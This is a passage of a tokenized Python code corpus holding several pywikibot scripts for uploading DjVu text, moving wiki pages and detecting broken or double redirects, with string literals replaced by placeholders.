<EOL> else : <EOL> start = int ( self . pages ) <EOL> end = start <EOL> pywikibot . output ( u"<STR_LIT>" % ( start , end ) ) <EOL> return range ( start , end + <NUM_LIT:1> ) <EOL> def run ( self ) : <EOL> pywikibot . setAction ( i18n . twtranslate ( pywikibot . getSite ( ) , <EOL> '<STR_LIT>' ) ) <EOL> linkingPage = pywikibot . Page ( pywikibot . getSite ( ) , self . index ) <EOL> self . prefix = linkingPage . title ( withNamespace = False ) <EOL> if self . prefix [ <NUM_LIT:0> : <NUM_LIT:6> ] == '<STR_LIT>' : <EOL> self . prefix = self . prefix [ <NUM_LIT:6> : ] <EOL> pywikibot . output ( u"<STR_LIT>" % self . prefix ) <EOL> gen = self . PagesGenerator ( ) <EOL> site = pywikibot . getSite ( ) <EOL> self . username = config . usernames [ site . family . name ] [ site . lang ] <EOL> for pageno in gen : <EOL> pywikibot . output ( "<STR_LIT>" % pageno ) <EOL> self . treat ( pageno ) <EOL> def has_text ( self ) : <EOL> cmd = u"<STR_LIT>" % ( self . djvu , self . djvu ) <EOL> os . system ( cmd . encode ( sys . stdout . encoding ) ) <EOL> f = codecs . open ( u"<STR_LIT>" % self . djvu , '<STR_LIT:r>' , <EOL> config . textfile_encoding , '<STR_LIT:replace>' ) <EOL> s = f . read ( ) <EOL> f . close ( ) <EOL> return s . find ( '<STR_LIT>' ) >= <NUM_LIT:0> <EOL> def get_page ( self , pageno ) : <EOL> pywikibot . output ( unicode ( "<STR_LIT>" % ( pageno ) ) ) <EOL> cmd = u"<STR_LIT>" % ( pageno , self . djvu , self . djvu ) <EOL> os . system ( cmd . encode ( sys . stdout . encoding ) ) <EOL> f = codecs . open ( u"<STR_LIT>" % self . djvu , '<STR_LIT:r>' , <EOL> config . textfile_encoding , '<STR_LIT:replace>' ) <EOL> djvu_text = f . read ( ) <EOL> f . close ( ) <EOL> return djvu_text <EOL> def treat ( self , pageno ) : <EOL> """<STR_LIT>""" <EOL> site = pywikibot . getSite ( ) <EOL> page_namespace = site . mediawiki_message ( '<STR_LIT>' ) <EOL> page = pywikibot . Page ( site , u'<STR_LIT>' <EOL> % ( page_namespace , self . prefix , pageno ) ) <EOL> exists = page . exists ( ) <EOL> djvutxt = self . get_page ( pageno ) <EOL> if not djvutxt : <EOL> text = ( u'<STR_LIT>' <EOL> % ( self . username ) ) <EOL> else : <EOL> text = ( u'<STR_LIT>' <EOL> % ( self . username , djvutxt ) ) <EOL> text = text . replace ( '<STR_LIT:U+0020>' , "<STR_LIT:\n>" ) <EOL> text = text . replace ( '<STR_LIT:U+0020>' , "<STR_LIT:\n>" ) <EOL> text = text . replace ( '<STR_LIT:U+0020>' , "<STR_LIT:\n>" ) <EOL> ask = self . ask <EOL> if exists : <EOL> ask = True <EOL> old_text = page . get ( ) <EOL> if old_text == text : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % page . title ( asLink = True ) ) <EOL> return <EOL> else : <EOL> old_text = '<STR_LIT>' <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % page . title ( ) ) <EOL> pywikibot . showDiff ( old_text , text ) <EOL> if ask : <EOL> if self . overwrite == '<STR_LIT:n>' : <EOL> choice = '<STR_LIT:n>' <EOL> pywikibot . output ( u"<STR_LIT>" ) <EOL> elif self . overwrite == '<STR_LIT:y>' : <EOL> choice = '<STR_LIT:y>' <EOL> pywikibot . output ( u"<STR_LIT>" ) <EOL> else : <EOL> choice = pywikibot . inputChoice ( u'<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT:y>' , '<STR_LIT:N>' ] , '<STR_LIT:N>' ) <EOL> else : <EOL> choice = '<STR_LIT:y>' <EOL> if choice == '<STR_LIT:y>' : <EOL> try : <EOL> page . put_async ( text ) <EOL> except pywikibot . LockedPage : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % page . title ( asLink = True ) ) <EOL> except pywikibot . EditConflict : <EOL> pywikibot . output ( u'<STR_LIT>' % ( page . title ( ) ) ) <EOL> except pywikibot . SpamfilterError , error : <EOL> pywikibot . output ( u'<STR_LIT>' % ( page . title ( ) , error . url ) ) <EOL> def main ( ) : <EOL> index = None <EOL> djvu = None <EOL> pages = None <EOL> ask = False <EOL> overwrite = '<STR_LIT>' <EOL> for arg in pywikibot . handleArgs ( ) : <EOL> if arg . startswith ( "<STR_LIT>" ) : <EOL> ask = True <EOL> elif arg . startswith ( "<STR_LIT>" ) : <EOL> overwrite = arg [ <NUM_LIT:11> : <NUM_LIT:12> ] <EOL> if overwrite != '<STR_LIT:y>' and overwrite != '<STR_LIT:n>' : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" % arg ) <EOL> overwrite = '<STR_LIT>' <EOL> elif arg . startswith ( "<STR_LIT>" ) : <EOL> djvu = arg [ <NUM_LIT:6> : ] <EOL> elif arg . startswith ( "<STR_LIT>" ) : <EOL> index = arg [ <NUM_LIT:7> : ] <EOL> elif arg . startswith ( "<STR_LIT>" ) : <EOL> pages = arg [ <NUM_LIT:7> : ] <EOL> else : <EOL> pywikibot . output ( u"<STR_LIT>" % arg ) <EOL> if djvu : <EOL> os . stat ( djvu ) <EOL> if not index : <EOL> import os . path <EOL> index = os . path . basename ( djvu ) <EOL> if djvu and index : <EOL> site = pywikibot . getSite ( ) <EOL> index_page = pywikibot . Page ( site , index ) <EOL> if site . family . name != '<STR_LIT>' : <EOL> raise pywikibot . PageNotFound ( <EOL> u"<STR_LIT>" % site . family . name ) <EOL> if not index_page . exists ( ) and index_page . namespace ( ) == <NUM_LIT:0> : <EOL> index_namespace = site . mediawiki_message ( <EOL> '<STR_LIT>' ) <EOL> index_page = pywikibot . Page ( pywikibot . getSite ( ) , <EOL> u"<STR_LIT>" % ( index_namespace , index ) ) <EOL> if not index_page . exists ( ) : <EOL> raise pywikibot . NoPage ( u"<STR_LIT>" % index ) <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % ( djvu , index_page . title ( asLink = True ) ) ) <EOL> bot = DjVuTextBot ( djvu , index , pages , ask , overwrite ) <EOL> if not bot . has_text ( ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> bot . run ( ) <EOL> else : <EOL> pywikibot . showHelp ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> main ( ) <EOL> finally : <EOL> pywikibot . stopme ( ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import family <EOL> class Family ( family . Family ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> family . Family . __init__ ( self ) <EOL> self . name = u'<STR_LIT>' <EOL> self . langs = { <EOL> u'<STR_LIT>' : None , <EOL> } <EOL> self . namespaces [ <NUM_LIT:4> ] = { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' , self . namespaces [ <NUM_LIT:4> ] [ '<STR_LIT>' ] ] , <EOL> } <EOL> self . namespaces [ <NUM_LIT:5> ] = { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' , self . namespaces [ <NUM_LIT:5> ] [ '<STR_LIT>' ] ] , <EOL> } <EOL> self . namespaces [ <NUM_LIT:100> ] = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> self . namespaces [ <NUM_LIT> ] = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> self . namespaces [ <NUM_LIT> ] = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> self . namespaces [ <NUM_LIT> ] = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> def hostname ( self , code ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' <EOL> def version ( self , code ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" <EOL> def scriptpath ( self , code ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import sys <EOL> import re <EOL> import pywikibot <EOL> from pywikibot import i18n <EOL> import pagegenerators <EOL> docuReplacements = { <EOL> '<STR_LIT>' : pagegenerators . parameterHelp , <EOL> } <EOL> class MovePagesBot : <EOL> def __init__ ( self , generator , addprefix , noredirect , always , skipredirects , <EOL> summary ) : <EOL> self . generator = generator <EOL> self . addprefix = addprefix <EOL> self . leaveRedirect = not noredirect <EOL> self . always = always <EOL> self . skipredirects = skipredirects <EOL> self . summary = summary <EOL> def moveOne ( self , page , newPageTitle ) : <EOL> try : <EOL> msg = self . summary <EOL> if not msg : <EOL> msg = i18n . twtranslate ( pywikibot . getSite ( ) , '<STR_LIT>' ) <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % ( page . title ( asLink = True ) , <EOL> newPageTitle ) ) <EOL> page . move ( newPageTitle , msg , throttle = True , <EOL> leaveRedirect = self . leaveRedirect ) <EOL> except pywikibot . NoPage : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> except pywikibot . IsRedirectPage : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> except pywikibot . LockedPage : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> except pywikibot . PageNotSaved , e : <EOL> pywikibot . output ( e . message ) <EOL> def treat ( self , page ) : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % page . title ( ) ) <EOL> if self . skipredirects and page . isRedirectPage ( ) : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> return <EOL> pagetitle = page . title ( withNamespace = False ) <EOL> namesp = page . site ( ) . namespace ( page . namespace ( ) ) <EOL> if self . appendAll : <EOL> newPageTitle = ( u'<STR_LIT>' <EOL> % ( self . pagestart , pagetitle , self . pageend ) ) <EOL> if not self . noNamespace and namesp : <EOL> newPageTitle = ( u'<STR_LIT>' % ( namesp , newPageTitle ) ) <EOL> elif self . regexAll : <EOL> newPageTitle = self . regex . sub ( self . replacePattern , pagetitle ) <EOL> if not self . noNamespace and namesp : <EOL> newPageTitle = ( u'<STR_LIT>' % ( namesp , newPageTitle ) ) <EOL> if self . addprefix : <EOL> newPageTitle = ( u'<STR_LIT>' % ( self . addprefix , pagetitle ) ) <EOL> if self . addprefix or self . appendAll or self . regexAll : <EOL> if not self . always : <EOL> choice2 = pywikibot . inputChoice ( <EOL> u'<STR_LIT>' % newPageTitle , <EOL> [ '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT:all>' , '<STR_LIT>' ] , [ '<STR_LIT:y>' , '<STR_LIT:n>' , '<STR_LIT:a>' , '<STR_LIT:q>' ] ) <EOL> if choice2 == '<STR_LIT:y>' : <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:a>' : <EOL> self . always = True <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:q>' : <EOL> sys . exit ( ) <EOL> elif choice2 == '<STR_LIT:n>' : <EOL> pass <EOL> else : <EOL> self . treat ( page ) <EOL> else : <EOL> self . moveOne ( page , newPageTitle ) <EOL> else : <EOL> choice = pywikibot . inputChoice ( u'<STR_LIT>' , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:c>' , '<STR_LIT:a>' , '<STR_LIT:r>' , '<STR_LIT:n>' , '<STR_LIT:q>' ] ) <EOL> if choice == '<STR_LIT:c>' : <EOL> newPageTitle = pywikibot . input ( u'<STR_LIT>' ) <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice == '<STR_LIT:a>' : <EOL> self . pagestart = pywikibot . input ( u'<STR_LIT>' ) <EOL> self . pageend = pywikibot . input ( u'<STR_LIT>' ) <EOL> newPageTitle = ( u'<STR_LIT>' <EOL> % ( self . pagestart , pagetitle , self . pageend ) ) <EOL> if namesp : <EOL> choice2 = pywikibot . inputChoice ( <EOL> u'<STR_LIT>' <EOL> % namesp , [ '<STR_LIT:yes>' , '<STR_LIT>' ] , [ '<STR_LIT:y>' , '<STR_LIT:n>' ] ) <EOL> if choice2 == '<STR_LIT:y>' : <EOL> noNamespace = True <EOL> else : <EOL> newPageTitle = ( u'<STR_LIT>' % ( namesp , newPageTitle ) ) <EOL> choice2 = pywikibot . inputChoice ( <EOL> u'<STR_LIT>' <EOL> % newPageTitle , [ '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT:all>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:y>' , '<STR_LIT:n>' , '<STR_LIT:a>' , '<STR_LIT:q>' ] ) <EOL> if choice2 == '<STR_LIT:y>' : <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:a>' : <EOL> self . appendAll = True <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:q>' : <EOL> sys . exit ( ) <EOL> elif choice2 == '<STR_LIT:n>' : <EOL> pass <EOL> else : <EOL> self . treat ( page ) <EOL> elif choice == '<STR_LIT:r>' : <EOL> searchPattern = pywikibot . input ( u'<STR_LIT>' ) <EOL> self . replacePattern = pywikibot . input ( <EOL> u'<STR_LIT>' ) <EOL> self . regex = re . compile ( searchPattern ) <EOL> if page . title ( ) == page . title ( withNamespace = False ) : <EOL> newPageTitle = self . regex . sub ( self . replacePattern , <EOL> page . title ( ) ) <EOL> else : <EOL> choice2 = pywikibot . inputChoice ( <EOL> u'<STR_LIT>' <EOL> % namesp , [ '<STR_LIT:yes>' , '<STR_LIT>' ] , [ '<STR_LIT:y>' , '<STR_LIT:n>' ] ) <EOL> if choice2 == '<STR_LIT:y>' : <EOL> newPageTitle = self . regex . sub ( <EOL> self . replacePattern , page . title ( withNamespace = False ) ) <EOL> noNamespace = True <EOL> else : <EOL> newPageTitle = self . regex . sub ( self . replacePattern , <EOL> page . title ( ) ) <EOL> choice2 = pywikibot . inputChoice ( <EOL> u'<STR_LIT>' <EOL> % newPageTitle , [ '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT:all>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:y>' , '<STR_LIT:n>' , '<STR_LIT:a>' , '<STR_LIT:q>' ] ) <EOL> if choice2 == '<STR_LIT:y>' : <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:a>' : <EOL> self . regexAll = True <EOL> self . moveOne ( page , newPageTitle ) <EOL> elif choice2 == '<STR_LIT:q>' : <EOL> sys . exit ( ) <EOL> elif choice2 == '<STR_LIT:n>' : <EOL> pass <EOL> else : <EOL> self . treat ( page ) <EOL> elif choice == '<STR_LIT:n>' : <EOL> pass <EOL> elif choice == '<STR_LIT:q>' : <EOL> sys . exit ( ) <EOL> else : <EOL> self . treat ( page ) <EOL> def run ( self ) : <EOL> self . appendAll = False <EOL> self . regexAll = False <EOL> self . noNamespace = False <EOL> for page in self . generator : <EOL> self . treat ( page ) <EOL> def main ( ) : <EOL> gen = None <EOL> prefix = None <EOL> oldName = None <EOL> newName = None <EOL> noredirect = False <EOL> always = False <EOL> skipredirects = False <EOL> summary = None <EOL> fromToPairs = [ ] <EOL> genFactory = pagegenerators . GeneratorFactory ( ) <EOL> for arg in pywikibot . handleArgs ( ) : <EOL> if arg . startswith ( '<STR_LIT>' ) : <EOL> if len ( arg ) == len ( '<STR_LIT>' ) : <EOL> filename = pywikibot . input ( <EOL> u'<STR_LIT>' ) <EOL> else : <EOL> filename = arg [ len ( '<STR_LIT>' ) : ] <EOL> oldName1 = None <EOL> for page in pagegenerators . TextfilePageGenerator ( filename ) : <EOL> if oldName1 : <EOL> fromToPairs . append ( [ oldName1 , page . title ( ) ] ) <EOL> oldName1 = None <EOL> else : <EOL> oldName1 = page . title ( ) <EOL> if oldName1 : <EOL> pywikibot . warning ( <EOL> u'<STR_LIT>' % filename ) <EOL> elif arg == '<STR_LIT>' : <EOL> noredirect = True <EOL> elif arg == '<STR_LIT>' : <EOL> always = True <EOL> elif arg == '<STR_LIT>' : <EOL> skipredirects = True <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> if oldName : <EOL> pywikibot . warning ( u'<STR_LIT>' % oldName ) <EOL> oldName = arg [ len ( '<STR_LIT>' ) : ] <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> if oldName : <EOL> fromToPairs . append ( [ oldName , arg [ len ( '<STR_LIT>' ) : ] ] ) <EOL> oldName = None <EOL> else : <EOL> pywikibot . warning ( u'<STR_LIT>' % arg ) <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> if len ( arg ) == len ( '<STR_LIT>' ) : <EOL> prefix = pywikibot . input ( u'<STR_LIT>' ) <EOL> else : <EOL> prefix = arg [ <NUM_LIT:8> : ] <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> if len ( arg ) == len ( '<STR_LIT>' ) : <EOL> summary = pywikibot . input ( u'<STR_LIT>' ) <EOL> else : <EOL> summary = arg [ <NUM_LIT:9> : ] <EOL> else : <EOL> genFactory . handleArg ( arg ) <EOL> if oldName : <EOL> pywikibot . warning ( u'<STR_LIT>' % oldName ) <EOL> for pair in fromToPairs : <EOL> page = pywikibot . Page ( pywikibot . getSite ( ) , pair [ <NUM_LIT:0> ] ) <EOL> bot = MovePagesBot ( None , prefix , noredirect , always , skipredirects , <EOL> summary ) <EOL> bot . moveOne ( page , pair [ <NUM_LIT:1> ] ) <EOL> if not gen : <EOL> gen = genFactory . getCombinedGenerator ( ) <EOL> if gen : <EOL> preloadingGen = pagegenerators . PreloadingGenerator ( gen ) <EOL> bot = MovePagesBot ( preloadingGen , prefix , noredirect , always , <EOL> skipredirects , summary ) <EOL> bot . run ( ) <EOL> elif not fromToPairs : <EOL> pywikibot . showHelp ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> try : <EOL> main ( ) <EOL> finally : <EOL> pywikibot . stopme ( ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import re <EOL> import datetime <EOL> import wikipedia as pywikibot <EOL> from pywikibot import i18n <EOL> import config <EOL> import query <EOL> import xmlreader <EOL> SPECIALPAGE_REGEX = '<STR_LIT>' <EOL> class RedirectGenerator : <EOL> def __init__ ( self , xmlFilename = None , namespaces = [ ] , offset = - <NUM_LIT:1> , <EOL> use_move_log = False , use_api = False , start = None , until = None , <EOL> number = None ) : <EOL> self . site = pywikibot . getSite ( ) <EOL> self . xmlFilename = xmlFilename <EOL> self . namespaces = namespaces <EOL> if use_api and not self . namespaces : <EOL> self . namespaces = [ <NUM_LIT:0> ] <EOL> self . offset = offset <EOL> self . use_move_log = use_move_log <EOL> self . use_api = use_api <EOL> self . api_start = start <EOL> self . api_until = until <EOL> self . api_number = number <EOL> if self . api_number is None : <EOL> if self . site . versionnumber ( ) < <NUM_LIT:16> or use_move_log : <EOL> self . api_number = config . special_page_limit <EOL> else : <EOL> self . api_number = '<STR_LIT>' <EOL> def get_redirects_from_dump ( self , alsoGetPageTitles = False ) : <EOL> '''<STR_LIT>''' <EOL> xmlFilename = self . xmlFilename <EOL> redict = { } <EOL> dump = xmlreader . XmlDump ( xmlFilename ) <EOL> redirR = self . site . redirectRegex ( ) <EOL> readPagesCount = <NUM_LIT:0> <EOL> if alsoGetPageTitles : <EOL> pageTitles = set ( ) <EOL> for entry in dump . parse ( ) : <EOL> readPagesCount += <NUM_LIT:1> <EOL> if readPagesCount % <NUM_LIT> == <NUM_LIT:0> : <EOL> pywikibot . output ( u'<STR_LIT>' % readPagesCount ) <EOL> if len ( self . namespaces ) > <NUM_LIT:0> : <EOL> if pywikibot . Page ( self . site , entry . title ) . namespace ( ) not in self . namespaces : <EOL> continue <EOL> if alsoGetPageTitles : <EOL> pageTitles . add ( entry . title . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) ) <EOL> m = redirR . match ( entry . text ) <EOL> if m : <EOL> target = m . group ( <NUM_LIT:1> ) <EOL> for code in self . site . family . iwkeys : <EOL> if target . startswith ( '<STR_LIT>' % code ) or target . startswith ( '<STR_LIT>' % code ) : <EOL> if code == self . site . language ( ) : <EOL> target = target [ ( len ( code ) + <NUM_LIT:1> ) : ] <EOL> if target . startswith ( '<STR_LIT::>' ) : <EOL> target = target [ <NUM_LIT:1> : ] <EOL> else : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' <EOL> % ( entry . title , code ) ) <EOL> target = None <EOL> break <EOL> if target : <EOL> source = entry . title . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> target = target . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> target = target . strip ( '<STR_LIT:_>' ) <EOL> if not pywikibot . getSite ( ) . nocapitalize : <EOL> source = source [ : <NUM_LIT:1> ] . upper ( ) + source [ <NUM_LIT:1> : ] <EOL> target = target [ : <NUM_LIT:1> ] . upper ( ) + target [ <NUM_LIT:1> : ] <EOL> if '<STR_LIT:#>' in target : <EOL> target = target [ : target . index ( '<STR_LIT:#>' ) ] . rstrip ( "<STR_LIT:_>" ) <EOL> if '<STR_LIT:|>' in target : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' <EOL> % entry . title ) <EOL> target = target [ : target . index ( '<STR_LIT:|>' ) ] . rstrip ( "<STR_LIT:_>" ) <EOL> if target : <EOL> redict [ source ] = target <EOL> if alsoGetPageTitles : <EOL> return redict , pageTitles <EOL> else : <EOL> return redict <EOL> def get_redirect_pageids_via_api ( self ) : <EOL> """<STR_LIT>""" <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT:list>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . api_number , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> for ns in self . namespaces : <EOL> params [ '<STR_LIT>' ] = ns <EOL> if self . api_start : <EOL> params [ '<STR_LIT>' ] = self . api_start <EOL> done = False <EOL> while not done : <EOL> pywikibot . output ( u'<STR_LIT>' , newline = False ) <EOL> data = query . GetData ( params , self . site ) <EOL> if '<STR_LIT:error>' in data : <EOL> raise RuntimeError ( "<STR_LIT>" % data [ '<STR_LIT:error>' ] ) <EOL> if "<STR_LIT>" in data : <EOL> params [ '<STR_LIT>' ] = int ( data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> for x in data [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> done = self . api_until and x [ '<STR_LIT:title>' ] >= self . api_until <EOL> if done : <EOL> return <EOL> yield x [ '<STR_LIT>' ] <EOL> if not done and '<STR_LIT>' in data : <EOL> params . update ( data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> else : <EOL> break <EOL> def _next_redirect_group ( self ) : <EOL> """<STR_LIT>""" <EOL> apiQ = [ ] <EOL> for pageid in self . get_redirect_pageids_via_api ( ) : <EOL> apiQ . append ( pageid ) <EOL> if len ( apiQ ) >= <NUM_LIT> : <EOL> yield apiQ <EOL> apiQ = [ ] <EOL> if apiQ : <EOL> yield apiQ <EOL> def get_redirects_via_api ( self , maxlen = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } <EOL> for apiQ in self . _next_redirect_group ( ) : <EOL> params [ '<STR_LIT>' ] = apiQ <EOL> pywikibot . output ( u'<STR_LIT:.>' , newline = False ) <EOL> data = query . GetData ( params , self . site ) <EOL> if '<STR_LIT:error>' in data : <EOL> raise RuntimeError ( "<STR_LIT>" % data ) <EOL> if data == [ ] or '<STR_LIT>' not in data : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> redirects = { } <EOL> pages = { } <EOL> redirects = dict ( ( x [ '<STR_LIT>' ] , x [ '<STR_LIT:to>' ] ) <EOL> for x in data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> for pagetitle in data [ '<STR_LIT>' ] [ '<STR_LIT>' ] . values ( ) : <EOL> if '<STR_LIT>' in pagetitle and '<STR_LIT>' not in pagetitle : <EOL> pages [ pagetitle [ '<STR_LIT:title>' ] ] = False <EOL> else : <EOL> pages [ pagetitle [ '<STR_LIT:title>' ] ] = True <EOL> for redirect in redirects : <EOL> target = redirects [ redirect ] <EOL> result = <NUM_LIT:0> <EOL> final = None <EOL> try : <EOL> if pages [ target ] : <EOL> final = target <EOL> try : <EOL> while result <= maxlen : <EOL> result += <NUM_LIT:1> <EOL> final = redirects [ final ] <EOL> except KeyError : <EOL> pass <EOL> except KeyError : <EOL> result = None <EOL> pass <EOL> yield ( redirect , result , target , final ) <EOL> def retrieve_broken_redirects ( self ) : <EOL> if self . use_api : <EOL> count = <NUM_LIT:0> <EOL> for ( pagetitle , type , target , final ) in self . get_redirects_via_api ( maxlen = <NUM_LIT:2> ) : <EOL> if type == <NUM_LIT:0> : <EOL> yield pagetitle <EOL> if self . api_number : <EOL> count += <NUM_LIT:1> <EOL> if count >= self . api_number : <EOL> break <EOL> elif not self . xmlFilename : <EOL> path = self . site . broken_redirects_address ( default_limit = False ) <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> maintenance_txt = self . site . getUrl ( path ) <EOL> Rredir = re . compile ( SPECIALPAGE_REGEX ) <EOL> redir_names = Rredir . findall ( maintenance_txt ) <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % len ( redir_names ) ) <EOL> for redir_name in redir_names : <EOL> yield redir_name <EOL> else : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' ) <EOL> redirs , pageTitles = self . get_redirects_from_dump ( <EOL> alsoGetPageTitles = True ) <EOL> for ( key , value ) in redirs . iteritems ( ) : <EOL> if value not in pageTitles : <EOL> yield key <EOL> def retrieve_double_redirects ( self ) : <EOL> if self . use_move_log : <EOL> if self . site . has_api ( ) : <EOL> gen = self . get_moved_pages_redirects ( ) <EOL> else : <EOL> gen = self . get_moved_pages_redirects_old ( ) <EOL> for redir_page in gen : <EOL> yield redir_page . title ( ) <EOL> elif self . use_api and self . site . has_api ( ) : <EOL> count = <NUM_LIT:0> <EOL> for ( pagetitle , type , target , final ) in self . get_redirects_via_api ( maxlen = <NUM_LIT:2> ) : <EOL> if type != <NUM_LIT:0> and type != <NUM_LIT:1> : <EOL> yield pagetitle <EOL> if self . api_number : <EOL> count += <NUM_LIT:1> <EOL> if count >= self . api_number : <EOL> break <EOL> elif self . xmlFilename : <EOL> redict = self . get_redirects_from_dump ( ) <EOL> num = <NUM_LIT:0> <EOL> for ( key , value ) in redict . iteritems ( ) : <EOL> num += <NUM_LIT:1> <EOL> if num > self . offset and value in redict : <EOL> yield key <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % ( num + <NUM_LIT:1> , len ( redict ) ) ) <EOL> else : <EOL> path = self . site . double_redirects_address ( default_limit = False ) <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> maintenance_txt = self . site . getUrl ( path ) <EOL> Rredir = re . compile ( SPECIALPAGE_REGEX ) <EOL> redir_names = Rredir . findall ( maintenance_txt ) <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % len ( redir_names ) ) <EOL> for redir_name in redir_names : <EOL> yield redir_name <EOL> def get_moved_pages_redirects ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . offset <= <NUM_LIT:0> : <EOL> self . offset = <NUM_LIT:1> <EOL> start = ( datetime . datetime . utcnow ( ) - <EOL> datetime . timedelta ( <NUM_LIT:0> , self . offset * <NUM_LIT> ) ) <EOL> offset_time = start . strftime ( "<STR_LIT>" ) <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % str ( self . api_number ) ) <EOL> move_gen = self . site . logpages ( mode = "<STR_LIT>" , start = offset_time , <EOL> number = self . api_number ) <EOL> if pywikibot . verbose : <EOL> pywikibot . output ( u"<STR_LIT>" % offset_time ) <EOL> for logentry in move_gen : <EOL> moved_page = logentry [ <NUM_LIT:0> ] <EOL> try : <EOL> if not moved_page . isRedirectPage ( ) : <EOL> continue <EOL> except pywikibot . BadTitle : <EOL> continue <EOL> except pywikibot . ServerError : <EOL> continue <EOL> try : <EOL> for page in moved_page . getReferences ( follow_redirects = True , <EOL> redirectsOnly = True ) : <EOL> yield page <EOL> except pywikibot . NoPage : <EOL> continue <EOL> def get_moved_pages_redirects_old ( self ) : <EOL> move_regex = re . compile ( <EOL> r'<STR_LIT>' ) <EOL> if self . offset <= <NUM_LIT:0> : <EOL> self . offset = <NUM_LIT:1> <EOL> offsetpattern = re . compile ( <EOL> r"""<STR_LIT>""" <EOL> r"""<STR_LIT>""" <EOL> r"""<STR_LIT>""" ) <EOL> start = datetime . datetime . utcnow ( ) - datetime . timedelta ( <NUM_LIT:0> , self . offset * <NUM_LIT> ) <EOL> offset_time = start . strftime ( "<STR_LIT>" ) <EOL> while True : <EOL> move_url = ( <EOL> "<STR_LIT>" % { '<STR_LIT:path>' : self . site . path ( ) , '<STR_LIT>' : offset_time } ) <EOL> try : <EOL> move_list = self . site . getUrl ( move_url ) <EOL> if pywikibot . verbose : <EOL> pywikibot . output ( u"<STR_LIT>" % offset_time ) <EOL> except : <EOL> import traceback <EOL> pywikibot . output ( unicode ( traceback . format_exc ( ) ) ) <EOL> return <EOL> g = move_regex . findall ( move_list ) <EOL> if pywikibot . verbose : <EOL> pywikibot . output ( u"<STR_LIT>" % len ( g ) ) <EOL> for moved_title in g : <EOL> moved_page = pywikibot . Page ( self . site , moved_title ) <EOL> try : <EOL> if not moved_page . isRedirectPage ( ) : <EOL> continue <EOL> except pywikibot . BadTitle : <EOL> continue <EOL> except pywikibot . ServerError : <EOL> 